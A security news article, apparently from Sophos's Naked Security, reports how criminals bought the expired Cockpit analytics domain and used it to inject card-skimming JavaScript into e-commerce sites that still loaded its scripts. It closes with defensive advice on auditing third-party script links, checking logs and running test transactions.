Credit card skimming – the long and winding road of supply chain failure

Source Node: 1768850

Researchers at application security company Jscrambler have just published a cautionary tale about supply chain attacks…

…that is also a powerful reminder of just how long attack chains can be.

Sadly, that’s long merely in terms of time, not long in terms of technical complexity or the number of links in the chain itself.

Eight years ago…

The high-level version of the story published by the researchers is simply told, and it goes like this:

  • In the early 2010s, a web analytics company called Cockpit offered a free web marketing and analytics service. Numerous e-commerce sites used this service by sourcing JavaScript code from Cockpit’s servers, thus incorporating third-party code into their own web pages as trusted content.
  • In December 2014, Cockpit shut down its service. Users were warned that the service would be going offline, and that any JavaScript code they imported from Cockpit would stop working.
  • In November 2021, cybercriminals bought up Cockpit’s old domain name. To what we can only assume was a mixture of surprise and delight, the crooks apparently found that at least 40 e-commerce sites still hadn’t updated their web pages to remove any links to Cockpit, and were still calling home and accepting any JavaScript code that was on offer.

You can see where this story is going.

Any hapless former Cockpit users who had apparently not checked their logs properly (or perhaps even at all) since late 2014 failed to notice that they were still trying to load code that wasn’t working.

We’re guessing that those businesses did notice they weren’t getting any more analytics data from Cockpit, but that because they were expecting the data feed to stop working, they assumed that the end of the data was the end of their cybersecurity concerns relating to the service and its domain name.

Injection and surveillance

According to Jscrambler, the crooks who took over the defunct domain, and who thus acquired a direct route to insert malware into any web pages that still trusted and used that now-revived domain…

…started doing exactly that, injecting unauthorised, malicious JavaScript into a wide range of e-commerce sites.

This enabled two major types of attack:

  • Insert JavaScript code to monitor the content of input fields on predetermined web pages. Data in input, select and textarea fields (such as you would expect in a typical web form) was extracted, encoded and exfiltrated to a range of “call home” servers operated by the attackers.
  • Insert additional fields into web forms on selected web pages. This trick, known as HTML injection, means that crooks can subvert pages that users already trust. Users can believably be lured into entering personal data that those pages wouldn’t normally ask for, such as passwords, birthdays, phone numbers or payment card details.

With this pair of attack vectors at their disposal, the crooks could not only siphon off whatever you typed into a web form on a compromised web page, but also go after additional personally identifiable information (PII) that they wouldn’t normally be able to steal.

By deciding which JavaScript code to serve up based on the identity of the server that requested the code in the first place, the crooks were able to tailor their malware to attack different types of e-commerce site in different ways.

This sort of tailored response, which is easy to implement by looking at the Referer: header sent in the HTTP requests generated by your browser, also makes it hard for cybersecurity rearchers to determine the full range of attack “payloads” that the criminals have up their sleeves.

After all, unless you know in advance the precise list of servers and URLs that the crooks are looking out for on their servers, you won’t be able to generate HTTP requests that shake loose all likely variants of the attack that the criminals have programmed into the system.

In case you’re wondering, the Referer: header, which is a mis-spelling of the English word “referrer”, gets its name from a typographical mistake in the original internet standards document.

What to do?

  • Review your web-based supply chain links. Anywhere that you rely on URLs provided by other people for data or code that you serve up as if it were your own, you need to check regularly and frequently that you can still trust them. Don’t wait for your own customers to complain that “something looks broken”. Firstly, that means you’re relying entirely on reactive cybersecurity measures. Secondly, there may not be anything obvious for customers themselves to notice and report.
  • Check your logs. If your own website makes use of embedded HTTP links that are no longer working, then something is clearly wrong. Either you shouldn’t have been trusting that link before, because it was the wrong one, or you shouldn’t be trusting it any more, because it’s not behaving as it used to. If you aren’t going to check your logs, why bother collecting them in the first place?
  • Perform test transactions regularly. Maintain a regular and frequent test procedure that realistically goes through the same online transaction sequences that you expect your customers to follow, and track all incoming and outgoing requests closely. This will help you to spot unexpected downloads (e.g. your test browser sucking in unknown JavaScript) and unexpected uploads (e.g. data being exfiltrated from the test browser to unusual destinations).

If you’re still sourcing JavaScript from a server that was retired eight years ago, especially if you’re using it in a service that handles PII or payment data, you’re not part of the solution, you’re part of the problem…

…so, please, don’t be that person!


Note for Sophos customers. The “revitalised” web domain used here for JavaScript injection (web-cockpit DOT jp, if you want to search your own logs) is blocked by Sophos as PROD_SPYWARE_AND_MALWARE and SEC_MALWARE_REPOSITORY. This denotes that the domain is known not only to be associated with malware-related cybercriminality, but also to be involved in actively serving up malware code.


Time Stamp:

More from Naked Security